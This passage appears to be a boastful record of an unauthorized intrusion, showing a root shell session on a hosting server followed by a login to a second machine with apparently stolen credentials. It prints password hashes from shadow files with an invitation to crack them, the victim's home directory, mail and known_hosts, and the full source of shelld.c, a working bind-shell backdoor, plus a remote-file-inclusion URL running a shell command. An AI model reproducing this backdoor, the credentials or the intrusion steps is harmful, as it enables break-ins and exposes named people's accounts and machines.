/usr/local/apache/bin/httpd -DSSL
nobody 13197 0.1 2.3 28160 24228 ? SN Apr07 1:56
/usr/local/apache/bin/httpd -DSSL
nobody 13227 0.1 2.2 26368 22980 ? SN Apr07 2:03
/usr/local/apache/bin/httpd -DSSL
nobody 13487 0.1 1.9 23524 20508 ? SN Apr07 2:08
/usr/local/apache/bin/httpd -DSSL
nobody 13798 0.1 2.4 28588 25068 ? SN Apr07 1:53
/usr/local/apache/bin/httpd -DSSL
nobody 13844 0.1 2.4 29248 25216 ? SN Apr07 2:07
/usr/local/apache/bin/httpd -DSSL
schawo 21293 0.0 0.1 2864 1376 ? S Apr08 0:00 imapd
livecart 23015 0.0 0.1 2664 1148 ? S Apr08 0:00 imapd
livecart 23016 0.0 0.1 2900 1496 ? S Apr08 0:00 imapd
root 26839 0.0 1.9 21956 20120 ? SN 00:41 0:00
/usr/bin/spamd -d --allowed-ips=127.0.0.1 --pidfile=/var/run/spamd.pid
--max-children=5
root 26881 0.0 2.0 23460 21712 ? SN 00:42 0:01 spamd child
root 26882 0.0 2.1 23544 21792 ? SN 00:42 0:01 spamd child
root 26883 0.0 2.1 23792 22088 ? SN 00:42 0:01 spamd child
root 26884 0.0 2.0 23356 21636 ? SN 00:42 0:01 spamd child
root 26885 0.0 2.1 23592 21836 ? SN 00:42 0:01 spamd child
mysql 31311 0.0 7.8 93980 81004 ? SN 01:01 0:02
/usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking
--socket=/var/lib/mysql/mysql.sock
bmxer103 15326 0.0 0.1 7108 1940 ? SN 01:34 0:00 pure-ftpd
(IDLE)
nobody 26943 0.1 1.7 20584 18176 ? SN 02:11 0:03
/usr/local/apache/bin/httpd -DSSL
nobody 30140 0.2 1.7 20592 18112 ? SN 02:24 0:02
/usr/local/apache/bin/httpd -DSSL
root 30670 0.0 0.1 6616 1932 ? SN 02:26 0:00
/usr/sbin/exim -q
root 31837 0.1 0.0 1532 416 ? SN 02:27 0:01 [bdflush]
root 3275 0.0 0.0 2180 1016 ? SN 02:35 0:00 inetd
root 5468 0.0 0.1 6868 2012 ? SN 02:41 0:00 sshd: rpm
[priv]
rpm 5506 0.0 0.2 7016 2304 ? SN 02:41 0:00 sshd:
rpm@pts/2
rpm 5507 0.0 0.1 5336 1364 pts/2 SN 02:41 0:00 -bash
nobody 5644 0.2 1.7 20428 17876 ? SN 02:42 0:00
/usr/local/apache/bin/httpd -DSSL
root 5678 0.0 0.1 2184 1216 pts/2 SN 02:42 0:00 k-rad
nobody 5995 0.1 1.7 20428 17884 ? SN 02:44 0:00
/usr/local/apache/bin/httpd -DSSL
nobody 6070 0.0 1.7 20428 17860 ? SN 02:44 0:00
/usr/local/apache/bin/httpd -DSSL
nobody 6107 0.1 1.7 20428 17956 ? SN 02:44 0:00
/usr/local/apache/bin/httpd -DSSL
vinniej 6340 0.0 6.7 77676 69456 ? SN 02:44 0:00 cpanellogd -
http logs for vinniej
vinniej 6360 0.0 0.0 2176 992 ? SN 02:45 0:00 sh -c
/usr/local/cpanel/bin/logrunner 1.0 /usr/local/cpanel/3rdparty/bin/analog
+C"IMAGEDIR /images/" +C"DOMAINSFILE
/usr/local/cpanel/3rdparty/share/analog/lang/ukdom.t
vinniej 6361 0.0 0.0 1524 420 ? SN 02:45 0:00
/usr/local/cpanel/bin/logrunner 1.0 /usr/local/cpanel/3rdparty/bin/analog
+CIMAGEDIR /images/ +CDOMAINSFILE
/usr/local/cpanel/3rdparty/share/analog/lang/ukdom.tab +CCHAR
mailnull 7849 0.4 0.3 7576 3720 ? SN 02:45 0:00
/usr/sbin/exim -bd -q60m
root 7976 5.0 0.3 7696 4104 ? SN 02:46 0:00
/usr/sbin/exim -q
mailnull 7977 0.0 0.4 7696 4148 ? RN 02:46 0:00
/usr/sbin/exim -q
root 7978 0.0 0.0 2884 892 pts/2 RN 02:46 0:00 ps aux
root@panther [/tmp]# cat /etc/passwd | grep killerz
killerz:x:32479:32483::/home/killerz:/usr/local/cpanel/bin/noshell // No
shell for rotor
root@panther [/tmp]# cat /etc/shadow | grep killerz
killerz:$1$KcR4KL0s$bHH0lKn5cYW5zMKnhInsh/:12870:::::: // But feel free to
crack his password :)
root@panther [/home2/killerz]# ls
./ .addon-installlog .contactemail .mailboxlist .neomail-rotor/
.spamkey .trash/ code/ index.html mail/ public_html/
www@
../ .addonscgi-phpBB .lastlogin .neomail/ .phpchats
.sqmaildata/ FreeBSD.png etc/ kscan.c public_ftp/ tmp/
root@panther [/home2/killerz]# ls *
FreeBSD.png index.html kscan.c
code:
./ ../ coolPHP.txt
etc:
./ ../ .imapv4cp5c ftpquota killerz.org/
mail:
./ ../ INBOX.Drafts INBOX.Sent INBOX.Trash inbox killerz.org/
neomail-trash saved-messages sent-mail
public_ftp:
./ ../ incoming/
public_html:
./ 0x41.tgz LOL.html _private/ _vti_inf.html _vti_txt/
c0n3ct.c chat.txt ebay/ fuck/ index.php kdoor.txt music/
newlay/ papers/ phpBB/ r00t/ tsniff.txt
../ FreeBSD/ Scan0007.jpg _vti_bin/ _vti_log/ abicons/
cam2/ code/ electronics/ hawe index_files/ klog.txt netit
newss.GIF pastebin/ pics/ scamz/ www-beta
.htaccess FreeBSD.png Thumbs.db _vti_cnf/ _vti_pvt/ b4b0.php
cgi-bin/ cutenews/ fileupload/ images/ irc/ kscan.c
netstat.txt owned/ pastebin.pl* postinfo.html shelld.c ~techg0d/
www:
./ 0x41.tgz LOL.html _private/ _vti_inf.html _vti_txt/
c0n3ct.c chat.txt ebay/ fuck/ index.php kdoor.txt music/
newlay/ papers/ phpBB/ r00t/ tsniff.txt
../ FreeBSD/ Scan0007.jpg _vti_bin/ _vti_log/ abicons/
cam2/ code/ electronics/ hawe index_files/ klog.txt netit
newss.GIF pastebin/ pics/ scamz/ www-beta
.htaccess FreeBSD.png Thumbs.db _vti_cnf/ _vti_pvt/ b4b0.php
cgi-bin/ cutenews/ fileupload/ images/ irc/ kscan.c
netstat.txt owned/ pastebin.pl* postinfo.html shelld.c ~techg0d/
tmp:
./ ../ analog/ awstats/ lastrun lastrun.bw webalizer/ webalizerftp/
root@panther [/home2/killerz]# cd www
root@panther [/home2/killerz/www]# ls *
0x41.tgz LOL.html Thumbs.db b4b0.php chat.txt index.php
klog.txt netit newss.GIF postinfo.html tsniff.txt
FreeBSD.png Scan0007.jpg _vti_inf.html c0n3ct.c hawe kdoor.txt
kscan.c netstat.txt pastebin.pl* shelld.c www-beta
FreeBSD:
./ ../ FreeBSD-flat.vmdk FreeBSD.png FreeBSD.png.sav FreeBSD.vmdk
FreeBSD.vmsn FreeBSD.vmx.sav nvram nvram.sav
_private:
./ ../ .htaccess
_vti_bin:
./ ../ .htaccess _vti_adm/ _vti_aut/
_vti_cnf:
./ ../ .htaccess
_vti_log:
./ ../ .htaccess
_vti_pvt:
./ ../ .htaccess .roles access.cnf botinfs.cnf bots.cnf deptodoc.btr
doctodep.btr frontpg.lck service.cnf service.grp service.lck
service.pwd services.cnf svcacl.cnf writeto.cnf
_vti_txt:
./ ../ .htaccess
abicons:
./ ava_bart.gif ava_inspector.gif
blugr-folder.gif clip.gif error.gif idea.gif
nb-blugr-go.gif pixel.gif support.gif wb-left.gif
../ ava_biz_man.gif ava_penguin.gif
blugr-folder_new.gif closedfolder.gif find.gif img.gif
nb-blugr-login.gif question.gif tongue.gif
wb-right.gif
3go.gif ava_blonde.gif ava_poo_bear.gif
botleftcorn.gif comp_usr.gif folder.gif index.html
nb-blugr-register.gif redarrow.gif top_corner_left.gif wb-top.gif
admin.gif ava_brutus.gif ava_popeye.gif
botrightcorn.gif curl_footer.gif folderlocked.gif join.gif
newmail.wav reload.gif top_corner_right.gif
wb-top_left.gif
agree.gif ava_duck.gif ava_red_nose.gif
bottom.gif curl_header.gif formicons/ line.gif
newpost.gif sad.gif topper2.gif
wb-top_right.gif
angry.gif ava_felix_cat.gif ava_sylvester.gif
bottom_corner_left.gif curve_ll.gif go.gif login.gif
news-eye.gif search_logo.jpg trans_img.gif who.gif
apache/ ava_garfield.gif ava_tweetybird.gif
bottom_corner_right.gif curve_lr.gif go32.gif logo.gif
news.gif smile.gif turtlegreen.gif yuk.gif
arc-left.gif ava_gentleman.gif ava_white_rabbit.gif
bottommenu.jpg curve_ul.gif go_btn.gif makeiconlist.pl
ntopcorn.gif smile_rotate.gif wb-bottom.gif
arc-right.gif ava_girl.gif ava_young_man.gif
brownmenu.jpg curve_ur.gif hlbg.gif menubrown.gif
ntopcornleft.gif smileb.gif wb-bottom_left.gif
ava.txt ava_girl_big_eye.gif avatars.htm
bullet.gif dark_folder.gif hline_mblue.gif msg.gif
overview.gif spinach.gif wb-bottom_right.gif
ava_barney_rubble.gif ava_huckleberryhound.gif blue-green.gif
chat.gif disagree.gif htmlarea/ navigate.gif
pencil.gif stats.gif wb-center.gif
cam2:
./ ../ back.JPG bottom.JPG front.JPG top.JPG
cgi-bin:
./ ../ abmasterd/ anyboard.cgi* getinfo.cgi* search.pl
code:
./ ../ anon.txt coolPHP.txt kscan.pl
cutenews:
./ ../ Copyright.GNU.txt README.htm data/ example1.php example2.php
inc/ index.php remember.js search.php show_archives.php show_news.php
skins/
ebay:
./ ../ index.html
electronics:
./ ../ ps2port/ volt/
fileupload:
./ ../ README.txt fileupload-class.php upload.php uploads/
fuck:
./ ../ kscan.c
images:
./ ../ 0day_cat_banner.jpg glowshell.gif
index_files:
./ ../ Thumbs.db filelist.xml image001.png image002.jpg
irc:
./ ../ .htaccess cgi-bin/
music:
./ ../ Brotha\ Lynch\ Hung\ -\ One\ Nigga\ Dead.mp3 Brotha\ Lynch\ Hung\
-\ Walking\ To\ My\ Funeral.mp3 c0n3ct.c deria.jpg
newlay:
./ ../ images/ index.html me.JPG search/
owned:
./ arren.php djwink.php e.php hostile.php kels.php
lamerDJWINK* lamerE* lamerHOSTILE* lamerLOCUSTZ* lamerREVIX*
lamerSILKK* lamerWARCHILD* nesa.php seattle.php spectre.php
../ badonkadonk.png dog.php escape.php index.html lamerARREN*
lamerDOG* lamerESCAPE* lamerKELS* lamerNESA* lamerSEATTLE*
lamerSPECTRE* locustz.php revix.php silkk.php warchild.php
papers:
./ ../ desolder.txt
pastebin:
./ ../ after before catdir/ cats pastes/
phpBB:
./ admin/ common.php db/ extension.inc groupcp.php includes/
language/ memberlist.php posting.php profile.php templates/
viewonline.php
../ cache/ config.php docs/ faq.php images/ index.php
login.php modcp.php privmsg.php search.php viewforum.php
viewtopic.php
pics:
./ ../ a3.JPG budz cam/ cross.JPG hk.JPG me.html me.swf meth/
modem.JPG moniter.JPG r0t0r1.JPG r0t0r2.JPG r0t0r3.JPG rotor!.JPG ss/
tower.JPG un4m31.jpg
r00t:
./ ../ shadow
scamz:
./ ../ lez/
~techg0d:
./ ../ AddonsForWebsites/ ircd/ tutorials/
root@panther [/home2/killerz/www]# cd code/
root@panther [/home2/killerz/www/code]# ls
./ ../ anon.txt coolPHP.txt kscan.pl
root@panther [/home2/killerz/www/code]# cat anon.txt
#!/usr/bin/perl
# (C) rotor 2004 - 2005
# http://www.killerz.org
# irc.killerz.org | rotor@killerz.org
# Script to send anonoymous mail
use Getopt::Std;
use IO::Socket;
getopt('hupfm', \%opts);
if (@ARGV == $opts{h}) {
print("$0 (C) rotor 2004 - 2005\n");
print("http://www.killerz.org \n");
print("$0 Help: \n");
print("-u help \n");
print("-h server \n");
print("-p port \n");
print("-f sender \n");
print("-m msg \n");
exit
}
$server = $opts{h}; # SMPT server
$port = $opts{p}; # SMPT server port
$sender = $opts{f}; # MAIL from
$recip = $opts{r}; # recipient
$msg =$opts{m}; #msg
my $sock = IO::Socket::INET->new(PeerAddr => "$server ",
PeerPort => "$port ",
Proto => "tcp")
or die "Cannot connect to host\n";
print("Decalre were email is sending from\n");
print $sock "HELO localhost\n";
sleep(1);
print("Giving email address from\n");
print $sock "MAIL FROM: $sender\n";
sleep(1);
print("Recipients address\n");
print $sock "RCPT TO: $recip\n";
sleep(1);
print("Sending cmd for msg compose\n");
print $sock "DATA\n";
print("Sending Subject\n");
print("Enter Subject:");
$sub=<STDIN>;
print $sock "Subject: $sub\n";
print("Sending msg\n");
print $sock "$msg\n";
root@panther [/home2/killerz/www/code]# cat kscan.pl
#!/usr/bin/perl
##
## killer-scan.pl (C) rotor 2005 - 2006
## rotor@killerz.org || http://www.killerz.org
use IO::Socket;
use strict;
my($port,$pstart,$pstop,$sock);
my $host = shift || 127.0.0.1;
$pstart = 1;
$pstop = 22;
for($port=$pstart;$port<=$pstop;$port++){
$sock = IO::Socket::INET->new("$host:$port") || next;
print "[ks] $port open on $host [ks]\n"; close($sock);
}
root@panther [/home2/killerz/www]# cat kscan.c
/*
* kscan.c (C) rotor 2005 - 2006
* rotor@killerz.org
* http://www.killerz.org
* http://dynamichell.com
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/tcp.h>
#include <netinet/ip.h>
#include <netinet/in.h>
#include <netdb.h>
#include <unistd.h>
#define STARTP 1
#define ENDP 1024
#define GREEN "\E[32m"
#define RED "\E[31m"
int sock, i;
int StartP, EndP;
struct sockaddr_in addr;
struct hostent *h;
struct servent *s;
int check(int port);
int usage(char *);
int main(int argc, char *argv[])
{
if(argc < 2) {
usage(argv[0]);
}
if(strcmp(argv[2], "-")==0 && strcmp(argv[3], "-")==0) {
StartP = (int)STARTP;
EndP = (int)ENDP;
} else {
StartP = atoi(argv[2]);
EndP = atoi(argv[3]);
}
if(StartP > EndP) {
printf(RED "Error: Start port is higher then end port\n");
usage(argv[0]);
}
if ((h=gethostbyname(argv[1])) == NULL){
printf(RED "Cant reolve host\n");
usage(argv[0]);
}
printf(GREEN "Scanning Host %s from %s to %s
\n",argv[1],STARTP,ENDP);
for(i=STARTP; i <= ENDP; i++) {
if (check(i)==0) {
h=getservbyport(htons(i),"tcp");
printf(GREEN "Port %d is open \n",i);
}
close(sock);
}
return 0;
}
int usage(char *Progname) {
printf(GREEN "%s (C) rotor 2005 - 2006\n",Progname);
printf(RED "Usage: %s [host] [start-port] [end-port]\n",Progname);
exit(1);
}
int check(int port) {
if((sock=socket(AF_INET,SOCK_STREAM,0)) == -1) {
perror("socket");
exit;
}
addr.sin_family = AF_INET;
addr.sin_port = htons(port);
addr.sin_addr = *((struct in_addr *)h->h_addr);
if((connect(sock,(struct sockaddr *) &addr, sizeof(addr)))==0)
return 0;
else
return 1;
}
root@panther [/home2/killerz/www]# cat shelld.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <mntent.h>
#include <sys/types.h>
#include <dirent.h>
#include <signal.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <errno.h>
#include <asm/ioctls.h>
void startdaemon (void);
int
main (int argc, char *argv[])
{
int sock, csock, l;
struct sockaddr_in caddr;
startdaemon ();
if ((sock = create_server (9999)) == -1)
{
// change to stdout so we can see it from PHP!!@!@
fprintf (stderr, "create_server FAIL\n");
exit (-1);
}
// stop zombies
signal (SIGCHLD, SIG_IGN);
while (1)
{
l = sizeof (struct sockaddr_in);
if ((csock = accept (sock, (struct sockaddr *) &caddr, &l)) == -1)
{
perror ("accept()");
exit (-1);
}
{
int optval = 1;
ioctl (sock, FIONBIO, &optval);
}
fprintf (stderr, "connection from: %s\n", inet_ntoa (caddr.sin_addr));
switch (fork ())
{
case -1:
perror ("fork()");
exit (1);
case 0: /* child */
/* maybe idle timeout ? */
// THIS IS GHETTO BUT FUCK IT I DONT REMEMBER HOWTO CODE PROPERLY.
write (csock, "B4B0 ownz you - chrak\r\n",
strlen ("B4B0 ownz you - chrak\r\n"));
{
char *args[] = { "/bin/sh", "-c", "/bin/sh", NULL }, *env[] =
{
"PATH=/usr/local/sbin:/usr/sbin:/sbin"
":/usr/local/bin:/usr/bin:/bin:.", NULL};
close (0);
close (1);
close (2);
dup2 (csock, 0);
dup2 (csock, 1);
dup2 (csock, 2);
execve ("/bin/bash", args, env);
}
close (csock);
exit (0);
default: /* parent */
close (csock);
}
}
}
void
startdaemon (void)
{
switch (fork ())
{
case -1:
perror ("fork()");
exit (1);
case 0: /* child */
break;
default: /* parent */
exit (0);
}
if (setsid () == -1)
{
perror ("setsid()");
exit (1);
}
//fclose(stdin);
//fclose(stdout);
}
int
create_server (unsigned int port)
{
int sock, l = 1;
struct sockaddr_in saddr;
if ((sock = socket (AF_INET, SOCK_STREAM, 0)) == -1)
{
perror ("socket()");
return -1;
}
setsockopt (sock, SOL_SOCKET, SO_REUSEADDR, &l, sizeof (int));
saddr.sin_family = AF_INET;
saddr.sin_port = htons (port);
saddr.sin_addr.s_addr = INADDR_ANY;
if (bind (sock, (struct sockaddr *) &saddr, sizeof (struct sockaddr)) ==
-1)
{
perror ("bind()");
return -1;
}
/* only 5 connection at a time heh!@ */
if (listen (sock, 5) == -1)
{
perror ("listen()");
return -1;
}
return sock;
}
/*
<Etruscan>
http://www.franchiseoutlet.com/us/about.php?page=http://www.learnandteachonline.com/p
hp.txt?&cmd=ls%20/
*/
root@panther [/home/killerz]# cd mail/
root@panther [/home/killerz/mail]# ls
./ ../ INBOX.Drafts INBOX.Sent INBOX.Trash inbox killerz.org/
neomail-trash saved-messages sent-mail
root@panther [/home/killerz/mail]# cd killerz.org/
root@panther [/home/killerz/mail/killerz.org]# ls
./ ../ rotor/
root@panther [/home/killerz/mail/killerz.org]# cd rotor/
root@panther [/home/killerz/mail/killerz.org/rotor]# ls
./ ../ .mailboxlist INBOX.Drafts INBOX.Sent INBOX.Trash inbox
sent-mail
root@panther [/home/killerz/mail/killerz.org/rotor]# cat inbox
root@panther [/home/killerz/mail/killerz.org/rotor]# cat sent-mail
From MAILER-DAEMON Tue Jan 11 15:15:19 2005
Date: 11 Jan 2005 15:15:19 -0800
From: Mail System Internal Data <MAILER-DAEMON@panther.unixbsd.info>
Subject: DON'T DELETE THIS MESSAGE -- FOLDER INTERNAL DATA
X-IMAP: 1105485319 0000000000
Status: RO
This text is part of the internal format of your mail folder, and is not
a real message. It is created automatically by the mail system software.
If deleted, important folder data will be lost, and it will be re-created
with the data reset to initial values.
From rotor@panther.unixbsd.info Tue Jan 11 15:15:19 2005 -0800
Status: R
X-Status:
X-Keywords:
Received: from 139.168.150.213 ([139.168.150.213])
by panther.unixbsd.info (IMP) with HTTP
for <rotor@killerz.org@localhost>; Tue, 11 Jan 2005 15:15:19 -0800
Message-ID: <1105485319.41e45e0765a4d@panther.unixbsd.info>
Date: Tue, 11 Jan 2005 15:15:19 -0800
From: rotor@killerz.org
To: presonic@gmail.com
Subject: ircbot
MIME-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit
User-Agent: Internet Messaging Program (IMP) 3.2.2
X-Originating-IP: 139.168.150.213
root@panther [/home/killerz/mail/killerz.org/rotor]# ls
./ ../ .mailboxlist INBOX.Drafts INBOX.Sent INBOX.Trash inbox
sent-mail
root@panther [/home/killerz/mail/killerz.org/rotor]# cat INBOX.s
cat: INBOX.s: No such file or directory
root@panther [/home/killerz/mail/killerz.org/rotor]# cat INBOX.Sent
From MAILER-DAEMON Mon Jan 10 01:02:29 2005
Date: 10 Jan 2005 01:02:29 -0800
From: Mail System Internal Data <MAILER-DAEMON@panther.unixbsd.info>
Subject: DON'T DELETE THIS MESSAGE -- FOLDER INTERNAL DATA
X-IMAP: 1105347749 0000000000
Status: RO
This text is part of the internal format of your mail folder, and is not
a real message. It is created automatically by the mail system software.
If deleted, important folder data will be lost, and it will be re-created
with the data reset to initial values.
root@panther [/home/killerz]# cd etc/killerz.org/
passwd passwd,v quota quota,v shadow shadow,v
root@panther [/home/killerz]# cd etc/killerz.org/
root@panther [/home/killerz/etc/killerz.org]# ls
./ ../ passwd passwd,v quota quota,v shadow shadow,v
root@panther [/home/killerz/etc/killerz.org]# cat *
rotor:x:32479:32483::/home/killerz/mail/killerz.org/rotor:/usr/local/cpanel/bin/noshell
head 1.3;
access;
symbols;
locks
killerz:1.3; strict;
comment @# @;
1.3
date 2005.01.10.03.01.21; author killerz; state Exp;
branches;
next 1.2;
1.2
date 2005.01.10.03.01.20; author killerz; state Exp;
branches;
next 1.1;
1.1
date 2004.12.17.12.19.04; author killerz; state Exp;
branches;
next ;
desc
@Init by cpanel-email: args hidden
@
1.3
log
@Modified by cpanel-email: args hidden.
@
text
@rotor:x:32479:32483::/home/killerz/mail/killerz.org/rotor:/usr/local/cpanel/bin/noshell
@
1.2
log
@Modified by cpanel-email: args hidden.
@
text
@d1 1
@
1.1
log
@Initial revision
@
text
@a0 1
rotor:x:32479:32483::/home/killerz/mail/killerz.org/rotor:/usr/local/cpanel/bin/noshell
@
rotor:10485760
head 1.3;
access;
symbols;
locks
killerz:1.3; strict;
comment @# @;
1.3
date 2005.01.10.03.01.21; author killerz; state Exp;
branches;
next 1.2;
1.2
date 2005.01.10.03.01.20; author killerz; state Exp;
branches;
next 1.1;
1.1
date 2004.12.17.12.19.04; author killerz; state Exp;
branches;
next ;
desc
@Init by cpanel-email: args hidden
@
1.3
log
@Modified by cpanel-email: args hidden.
@
text
@rotor:10485760
@
1.2
log
@Modified by cpanel-email: args hidden.
@
text
@d1 1
@
1.1
log
@Initial revision
@
text
@a0 1
rotor:10485760
@
rotor:$1$LXus42oY$ji4FpxrSMSkFVfw0OZer5/:::::::
head 1.3;
access;
symbols;
locks
killerz:1.3; strict;
comment @# @;
1.3
date 2005.01.10.03.01.21; author killerz; state Exp;
branches;
next 1.2;
1.2
date 2005.01.10.03.01.20; author killerz; state Exp;
branches;
next 1.1;
1.1
date 2004.12.17.12.19.04; author killerz; state Exp;
branches;
next ;
desc
@Init by cpanel-email: args hidden
@
1.3
log
@Modified by cpanel-email: args hidden.
@
text
@rotor:$1$LXus42oY$ji4FpxrSMSkFVfw0OZer5/:::::::
@
1.2
log
@Modified by cpanel-email: args hidden.
@
text
@d1 1
@
1.1
log
@Initial revision
@
text
@a0 1
rotor:$1$Ttync3Vr$.Jm3t1eoPrfUOFLo1xwNX1:::::::
@
root@panther [/home/killerz/etc/killerz.org]# exit
## I guess that took care of rotor. He pays for that shell and doesnt even
have shell..
## Life is truly sad..
## Well enough talking its time to explore matts.homeunix.net.. I have a
feeling this one might be very interesting
[4] I think this is west's box.. He keeps all of his private shit here
ssh -l rotor matts.homeunix.net
rotor@matts.homeunix.net's password:
Last login: Thu Apr 7 04:04:39 2005 from 203-206-252-62.
FreeBSD 5.3-RELEASE-p7 (SENTINEL) #2: Mon Apr 4 21:43:16 PDT 2005
AUTHORIZED USE ONLY
Welcome to the
____ _____ _ _ _____ ___ _ _ _____ _
/ ___|| ____| \ | |_ _|_ _| \ | | ____| |
\___ \| _| | \| | | | | || \| | _| | |
___) | |___| |\ | | | | || |\ | |___| |___
|____/|_____|_| \_| |_| |___|_| \_|_____|_____|.pcinetworks.net
Enjoy your stay
News:
03/10/05 IPv6 working... and Vhosts. Type vhosts to view them...
If you're new to this box, change your damn default pw i gave you..
if i crack your pw, you get disabled for a week...
i crack the pw list every week..
to get vhosts, type 'vhosts'
lq(rotor@Sentinel.homeunix.net)
mq(~)-> ls
./ .cshrc .mail_aliases .rhosts aolup.bx cyp/
dog.php escape.php kels.php lamerDOG lamerHOSTILE lamerNESA
lamerSILKK locustz.php revix.php spectre.php
../ .login .mailrc .shrc arren.php
cyp1.0k.tar.gz dyndns hostile.php lamerARREN lamerE lamerKELS
lamerREVIX lamerSPECTRE nesa.php seattle.php warchild.php
.BitchX/ .login_conf .profile .ssh/ badonkadonk.png djwink.php
e.php index.html lamerDJWINK lamerESCAPE lamerLOCUSTZ
lamerSEATTLE lamerWARCHILD own/ silkk.php
(rotor@Sentinel.homeunix.net)
mq(~)-> uname -a; id
FreeBSD Sentinel.homeunix.net 5.3-RELEASE-p7 FreeBSD 5.3-RELEASE-p7 #2: Mon
Apr 4 21:43:16 PDT 2005
west@Sentinel.homeunix.net:/usr/src/sys/i386/compile/SENTINEL i386
uid=1014(rotor) gid=1014 groups=1014
lq(rotor@Sentinel.homeunix.net)
mq(~)-> cat .ssh/known_hosts
zoopile.com,24.60.126.50 ssh-dss
AAAAB3NzaC1kc3MAAACBAPH7U1sa+05gcMO5/5DTl9MEsqivT0qJdWQ2iwpo9eBOhECED03oA4i4Z6MkL6pfXali1p2YUayEsi3uHj0D7ijr9j84S7lpVJMrC/GKc3iqZv01PL8UrYlymcS6s8KrQT5QRoYTq6EmyNghcTXCn3qsHnBZ+bOpEa0O7SM9vHlfAAAAFQDXB7/fpKUbGLBe7kBoIuugrZysGQAAAIBWG7tIgCTFNmpT1zu2AfItEAnZNkPY1GsKoY+Wogz9tXsk7Y4cqA4E2DvWVsC3aASKEqeDauv6+nZIHLscvJ/oqOycWiJjH4X9QN6Rx+ZTVqv/j+CVWugT8TG+dlAjINvu/mfnd3FveBWgBgYHJ5cSgdq4HIHxtSUUEq9q10oIdgAAAIAAvRGvBVqS+VFhq+QPRlc2jEfGQH3g6zIOhwePEeLXAwem4uJYqBsMMyY+tRF9ElEuW87OAPK1pHSX+iOM01JBQbAwE8FnteQ/Ulj2le/7VU6nSNBgXUMB/7xIb95Sn+SOID/nx1LZ2BCIU8f95NIvRQRytAPgUQu+jBKdx1XW4A==
segmentation-fault.net,68.98.176.120 ssh-dss
AAAAB3NzaC1kc3MAAACBAKB7sr+8e9KsJNNopl+OkfrLvwuD/BEybTb93sbZyZnPMbXBkVcEOostWAZCS4VuI0GsmNLm182L7MAOrzmLWh614SAGeAAhXDJDFd7DUNvV8ER+vqSSDxsMM9CfKxwsdaRE2UhWfJp893//rX6/+131mGyl4KzB0SORfLsfMYzrAAAAFQCqNCbHJEk1KhBdJr+Cb1PuF4z39QAAAIBVEIHOzSh7XKcssrLR7Xgu2Embnvlyub18VRyF8vwpG/VxzM4R1v6kjuVYEsEXvX55aGa8y0Jq8QY/W0uF1bH0o1dMjVj6N+533ex8AgVCKbrZ4L50nvBIuoGWhHfRTtXi1i9zFzDmpmrccuINDmx3Z+XFF4GgEVkewPCZ/oRf3QAAAIEAky7TJb+xSp39Sn+2lggXL1Y3zm2hvWokamUunmiklo+ojS5NjErxN2R7wgGKjKP/9LObwP3hu/eHZfYFgp8dIgKLyUDlnBZGFLCzk+5JIpJM9x76qqpMgOS8n11cVmAeFYCZJICzpRysac4MyEjTpw+XAng33293Nih7m9bRUqA=
66.139.78.11 1024 41
104815528740090300232762682062148731692345617648761884893144749702438178716507602106384467348442332555726272229905090060865518152094220166348851874522827117669256069180699567468232805547620203421525417575684002027686936703327559508891840428578000903598085456851354927023314524854708653799840391129004567592229
cserverz.com,67.18.187.218 ssh-dss
AAAAB3NzaC1kc3MAAACBAKCIzY/RIptsfWxt5WPOXk5TnoMG14VNdhXu0h1NRTIU0U+5SOxSMZNKWnDOiJbx2TC6nNKIY+srGIVxLDTL/SSFNvdaLwhrKnQEQTyPL9YewXRaaUP1XND83ETzc5jVZxExticAaisaVeB8QdKETfjD9D7NzN3jr3Nr7xRyOt+tAAAAFQCtxMcM60SLmetmFwGyYQStCGY6vwAAAIEAkOG+5HSQfKU7X14HlDRSL6t14DPKPj5Xjso0BYdA+3GZ4+HlhH79BJiug7pNUFX1sESZxL8W7fe5AYEasd2LG6E3fvFbpgBWsqVRRLAdPiGy2h3HdMs3MCtVLGSuL6QJQC0RLcEF9TeWg9MAuIUm8FsXP/+/69xPFR4DmwkZIF8AAACBAJu46dAQ+dmxLIOKAUm9XU9WcrIlmccXoFF/OJ0iysignedarcL8NCW1zdH823hXCU/e5U5VbKYjEkOoHUfU03JAbQnW7S7nkuym91O5a8gUx0uB7I6TfpuqgF2MoP3jbirZYT67l4mmrsR+19DQkhNZFvoJpQNSsBQMoQAyO7+J
cappa.kicks-ass.net,69.17.187.156 ssh-dss
AAAAB3NzaC1kc3MAAACBAP/3yV92Esyb8Plbc8OqE4AQI9ASC69yZrcWj1Co0yBiIJSvpvnmyE1soyNPXi79OUcK/9MNAw26AreGdk8pIBvfw9r2nrDb/G5RgZeagybl+5SwRJJbS/kM/SaLYv9BxjzfvBgrnh0SVliJdRNxXTwVXg2WbBFoHH6cxV2++UIfAAAAFQDKLR5ilWYPN2QmY88tIkJj7O6xtwAAAIEAnPm1735i744Oi0YoOwLRkFIyHrfbO0DYhN/I2+ahC5WnETyBgg36r+Gp8KxGmnT9pFYVmvJYL/a0vcc7zMoylk+ijUGKeiQ/GlMzLWei0ELGFGiUFprC8lKhVRity46hH0gRtSLudI1psDqthLKtVdxorLjhPok11l5S2rMIreUAAACAcZOO7w8RMEbVXMLc6FxmhfwHBmUq4wSTQ491+XVa7VwFB825rBJ//ONXzwi43CPLQPOYXiZED+9ToFRIuN/+1vIvaheCeVT/zbJXdbiYVG3lLYJpzHgT8HiVDcyqn1XimMU5U4/qLgqDPxlfJWc+wImISL0lw0Qevi1aS3CHxqU=
cappa.kicks.ass.net,64.15.205.202 ssh-dss
